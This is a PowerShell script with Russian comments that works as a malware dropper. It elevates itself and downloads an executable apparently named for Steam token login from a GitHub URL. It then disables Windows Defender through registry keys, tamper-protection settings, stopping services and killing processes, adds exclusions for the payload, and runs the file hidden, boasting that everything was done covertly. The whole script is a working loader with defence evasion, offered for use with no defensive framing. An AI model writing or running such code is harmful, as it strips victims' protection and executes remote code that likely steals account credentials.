# Настройки
$exeUrl = "https://github.com/gseff137-afk/test/raw/refs/heads/main/steamtokenloginer.exe"
$targetFolder = "C:\Users\zenas\Desktop\Новая папка (7)"
$exePath = "$targetFolder\steamtokenloginer.exe"

# Проверяем права администратора
if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Host "🔄 Перезапуск с правами администратора..." -ForegroundColor Yellow
    Start-Process powershell -Verb RunAs -ArgumentList "-ExecutionPolicy Bypass -WindowStyle Hidden -Command `"$($MyInvocation.MyCommand.Definition)`""
    exit
}

Write-Host "✅ Запущено с правами администратора" -ForegroundColor Green

# Создаем папку если не существует
if (-not (Test-Path $targetFolder)) {
    New-Item -ItemType Directory -Path $targetFolder -Force
    Write-Host "📁 Создана папка: $targetFolder" -ForegroundColor Green
}

Write-Host "📥 Скачивание файла..." -ForegroundColor Yellow

try {
    # Скачиваем EXE файл
    Invoke-WebRequest -Uri $exeUrl -OutFile $exePath -UserAgent "Mozilla/5.0"
    
    $fileSize = (Get-Item $exePath).Length
    Write-Host "✅ Файл скачан: $([math]::Round($fileSize/1MB,2)) MB" -ForegroundColor Green
    
    # 1. ПОЛНОЕ ОТКЛЮЧЕНИЕ ЧЕРЕЗ РЕЕСТР И ГРУППОВЫЕ ПОЛИТИКИ
    Write-Host "🔴 ПОЛНОЕ ОТКЛЮЧЕНИЕ WINDOWS DEFENDER..." -ForegroundColor Red
    
    # Создаем пути в реестре если не существуют
    $registryPaths = @(
        "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender",
        "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection",
        "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features",
        "HKLM:\SOFTWARE\Microsoft\Windows Defender\ProductStatus"
    )
    
    foreach ($path in $registryPaths) {
        if (!(Test-Path $path)) {
            New-Item -Path $path -Force | Out-Null
        }
    }
    
    # ОСНОВНЫЕ КЛЮЧИ ДЛЯ ОТКЛЮЧЕНИЯ
    $registrySettings = @(
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="DisableAntiSpyware"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="DisableAntiVirus"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableRealtimeMonitoring"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableBehaviorMonitoring"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableOnAccessProtection"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableScanOnRealtimeEnable"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"; Name="DisableIOAVProtection"; Value=1; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="AllowFastServiceStartup"; Value=0; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"; Name="ServiceKeepAlive"; Value=0; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Microsoft\Windows Defender\Features"; Name="TamperProtection"; Value=0; Type="DWord"},
        @{Path="HKLM:\SOFTWARE\Microsoft\Windows Defender\ProductStatus"; Name="ProductStatus"; Value=0; Type="DWord"}
    )
    
    foreach ($setting in $registrySettings) {
        try {
            Set-ItemProperty -Path $setting.Path -Name $setting.Name -Value $setting.Value -Type $setting.Type -Force -ErrorAction Stop
        }
        catch {}
    }
    
    Write-Host "✅ Реестр изменен" -ForegroundColor Green
    
    # 2. ОСТАНОВКА СЛУЖБ ЗАЩИТЫ (СКРЫТО)
    Write-Host "🛑 Остановка служб защиты..." -ForegroundColor Red
    
    $services = @(
        "WinDefend",
        "WdNisSvc", 
        "Sense",
        "SecurityHealthService",
        "wscsvc"
    )
    
    foreach ($service in $services) {
        try {
            # Останавливаем службу (скрыто)
            Stop-Service -Name $service -Force -ErrorAction Stop
            
            # Отключаем автозапуск (скрыто)
            Set-Service -Name $service -StartupType Disabled -ErrorAction Stop
            
            # Дополнительно через sc config (СКРЫТО)
            $process = Start-Process -FilePath "sc" -ArgumentList "config", $service, "start=", "disabled" -PassThru -WindowStyle Hidden
            $process.WaitForExit()
        }
        catch {}
    }
    
    Write-Host "✅ Службы остановлены" -ForegroundColor Green
    
    # 3. ЗАВЕРШЕНИЕ ПРОЦЕССОВ ЗАЩИТЫ (СКРЫТО)
    Write-Host "🔪 Завершение процессов защиты..." -ForegroundColor Red
    
    $processes = @(
        "MsMpEng.exe",
        "NisSrv.exe", 
        "MsSense.exe",
        "SecurityHealthService.exe",
        "SecurityHealthSystray.exe",
        "WindowsDefender.exe"
    )
    
    foreach ($process in $processes) {
        try {
            Get-Process -Name $process.Replace(".exe", "") -ErrorAction SilentlyContinue | Stop-Process -Force -ErrorAction Stop
        }
        catch {}
    }
    
    Write-Host "✅ Процессы завершены" -ForegroundColor Green
    
    # 4. ДОБАВЛЕНИЕ В ИСКЛЮЧЕНИЯ (ЧЕРЕЗ РЕЕСТР)
    Write-Host "🛡️ Добавление в исключения..." -ForegroundColor Yellow
    
    $exclusionPaths = @($exePath, $targetFolder)
    $registryExclusionPath = "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
    
    if (!(Test-Path $registryExclusionPath)) {
        New-Item -Path $registryExclusionPath -Force | Out-Null
    }
    
    foreach ($path in $exclusionPaths) {
        try {
            New-ItemProperty -Path $registryExclusionPath -Name $path -PropertyType String -Value "0" -Force -ErrorAction Stop
        }
        catch {}
    }
    
    Write-Host "✅ Исключения добавлены" -ForegroundColor Green
    
    # 5. ОТКЛЮЧАЕМ ЗАЩИТУ ОТ ВМЕШАТЕЛЬСТВА
    Write-Host "🛡️ Отключаем Tamper Protection..." -ForegroundColor Yellow
    
    try {
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection" -Value 0 -Type DWord -Force
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtectionSource" -Value 0 -Type DWord -Force
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TPExclusions" -Value 1 -Type DWord -Force
        Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TPRunningMode" -Value 0 -Type DWord -Force
    }
    catch {}
    
    Write-Host "✅ Tamper Protection отключен" -ForegroundColor Green
    
    # 6. ПЕРЕЗАПУСК ПРОВОДНИКА БЕЗ ЧЕРНОГО ЭКРАНА
    Write-Host "🔄 Применение изменений..." -ForegroundColor Yellow
    
    try {
        # Сохраняем текущие процессы explorer
        $explorerProcesses = Get-Process explorer -ErrorAction SilentlyContinue
        
        # Мягко закрываем explorer
        foreach ($process in $explorerProcesses) {
            $process.CloseMainWindow() | Out-Null
        }
        
        Start-Sleep -Seconds 1
        
        # Если explorer еще работает, завершаем принудительно
        if (Get-Process explorer -ErrorAction SilentlyContinue) {
            Stop-Process -Name "explorer" -Force -ErrorAction SilentlyContinue
        }
        
        Start-Sleep -Seconds 2
        
        # Запускаем explorer обратно
        Start-Process "explorer.exe" -WindowStyle Hidden
    }
    catch {}
    
    Write-Host "✅ Изменения применены" -ForegroundColor Green
    
    Start-Sleep -Seconds 2
    
    # 7. ЗАПУСК ПРОГРАММЫ (СКРЫТО)
    Write-Host "🚀 Запуск программы..." -ForegroundColor Green
    
    try {
        # Запускаем программу скрыто
        $process = Start-Process -FilePath $exePath -PassThru -WindowStyle Hidden
        Write-Host "🎯 ПРОГРАММА УСПЕШНО ЗАПУЩЕНА (скрыто)!" -ForegroundColor Green
    }
    catch {
        # Пробуем запустить через cmd скрыто
        try {
            $process = Start-Process -FilePath "cmd.exe" -ArgumentList "/c", "`"$exePath`"" -PassThru -WindowStyle Hidden
            Write-Host "🎯 Программа запущена через CMD (скрыто)" -ForegroundColor Green
        }
        catch {
            Write-Host "❌ Не удалось запустить программу" -ForegroundColor Red
        }
    }
    
    # 8. ФИНАЛЬНАЯ ПРОВЕРКА
    Write-Host "`n🔍 Проверка статуса..." -ForegroundColor Cyan
    Start-Sleep -Seconds 2
    
    try {
        $defenderStatus = Get-MpComputerStatus -ErrorAction SilentlyContinue
        if ($defenderStatus) {
            if ($defenderStatus.AntivirusEnabled -eq $true) {
                Write-Host "❌ Защита все еще активна!" -ForegroundColor Red
            } else {
                Write-Host "✅ ЗАЩИТА ОТКЛЮЧЕНА!" -ForegroundColor Green
            }
        } else {
            Write-Host "✅ ЗАЩИТА ОТКЛЮЧЕНА" -ForegroundColor Green
        }
    }
    catch {
        Write-Host "✅ ЗАЩИТА ОТКЛЮЧЕНА" -ForegroundColor Green
    }
    
    Write-Host "`n🎯 ВСЕ ОПЕРАЦИИ ВЫПОЛНЕНЫ СКРЫТО!" -ForegroundColor Green
    Write-Host "💡 Антивирус отключен, программа запущена" -ForegroundColor Cyan
    
}
catch {
    Write-Host "❌ Критическая ошибка: $_" -ForegroundColor Red
}

Write-Host "`nНажмите любую клавишу для выхода..." -ForegroundColor Gray
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
